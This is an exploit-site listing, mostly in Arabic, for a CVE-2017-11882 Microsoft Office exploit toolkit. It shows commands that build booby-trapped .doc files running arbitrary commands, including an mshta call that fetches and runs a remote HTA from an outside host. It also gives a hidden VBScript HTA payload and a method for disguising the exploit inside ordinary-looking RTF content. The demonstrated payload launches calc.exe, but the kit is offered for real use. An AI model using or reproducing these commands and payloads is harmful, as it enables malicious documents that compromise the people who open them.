Sploitus

Exploit for CVE-2017-11882

kitploit · 2026-09-06

Exploit Code

MARKDOWN77 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RIDTER-CVE-2017-11882
# CVE-2017-11882

43b النص الأصلي من https://github.com/embedi/CVE-2017-11882

109b النص الأصلي من https://github.com/unamer/CVE-2017-11882/ (تحية، الآن كود unamer يمكنه تنفيذ شيلكود~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://vulners.com/cve/CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

## الاستخدام

root@kitploit:~
    
    
    python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
    

استخدم mshta

root@kitploit:~
    
    
    python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc
    

abc

root@kitploit:~
    
    
    <HTML> 
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <HEAD> 
    <script language="VBScript">
    Window.ReSizeTo 0, 0
    Window.moveTo -2000,-2000
    Set objShell = CreateObject("Wscript.Shell")
    objShell.Run "calc.exe"
    self.close
    </script>
    <body>
    demo
    </body>
    </HEAD> 
    </HTML> 
    
    

> طول الأمر لـ 43b لا يتجاوز 43 بايت، طول الأمر لـ 109b لا يتجاوز 109 بايت

# مثال استغلال لـ CVE-2017-11882 (بدء تشغيل calc.exe كحمولة)

مجلد `example` يحتوي على ملف .rtf يستغل ثغرة CVE-2017-11882 ويقوم بتشغيل الآلة الحاسبة في النظام.

## حول المحتوى المخصص

في الواقع، طريقة المحتوى المخصص تعلمتها من خبراء آخرين، وقد كتبتها كسكريبت منذ فترة طويلة. لم أكن أنوي نشره في البداية، ولكن بعد أن رأيت أحد أعضاء الفريق قد نشره، لم يكن أمامي خيار سوى نشره. الطريقة بسيطة جدًا: فقط افتح مستند rtf عادي في محرر نصوص، انسخ كل المحتوى قبل `{\*\datastore`، واستبدل كل المحتوى قبل `{\object\objautlink\objupdate`، لذا كتابتها في سكريبت أمر بسيط جدًا.

طريقة استخدام المحتوى المخصص، اختر أي سكريبت:

root@kitploit:~
    
    
    python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf
    

المحتوى المخصص موجود في input.rtf.

بخصوص سكريبت unamer الأخير الذي يبلغ طوله 605 بايت، لن أقوم بتحديثه، يمكن للمهتمين تعديله بأنفسهم.